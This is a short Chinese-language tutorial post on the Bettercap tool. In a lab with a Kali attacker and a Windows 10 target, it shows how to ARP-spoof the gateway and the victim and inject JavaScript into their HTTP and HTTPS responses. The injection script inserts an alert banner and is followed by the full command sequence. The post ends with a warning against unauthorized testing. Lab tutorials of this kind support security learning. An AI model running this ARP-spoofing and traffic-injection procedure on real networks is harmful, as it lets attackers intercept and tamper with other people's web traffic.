Bettercap使用教程

作者:pluto | 发布时间: | 更新时间:

0x00 目标

  • 模拟arp欺骗,修改靶机IP的http和https返回包。

0x01 测试环境

  • 名称

    IP

    备注

    攻击

    192.168.2.x

    虚拟机 kali

    靶机

    192.168.2.x

    客户机 win10

0x02 测试步骤

  • 在kali /home/test 目录下写一个js脚本
  • function onResponse(req,res){
        if(res.ContentType.indexOf('text/html')==0){
            var body=res.ReadBody();
            if(body.indexOf('</head>')!=-1){
                res.Body=body.replace(
                    '</head>',
                   '<script type="text/javascript">alert("your computer has hacked!")</script></head>'
                );
                }
            }
    }
  • 启动bettercap
  • 4a47a0db6e102534设置攻击目标
  • set arp.spoof.targets 192.168.2.1,192.168.2.181 #设置arp欺骗的目标,这里欺骗的是网关和目标机器

    set http.proxy.script /home/test/1.js #往http流量中注入脚本

    set https.proxy.script /home/test/1.js #往https流量中注入脚本

    http.proxy on #开启HTTP代理

    https.proxy on #开启HTTPS代理

    arp.spoof on #开启ARP欺骗

  • fb5c81ed3a102636

    靶机访问http,https网站

    09dd8c2662102732 10fb15c772102751 遵守网络安全法,请勿未经授权进行测试
标签:bettercap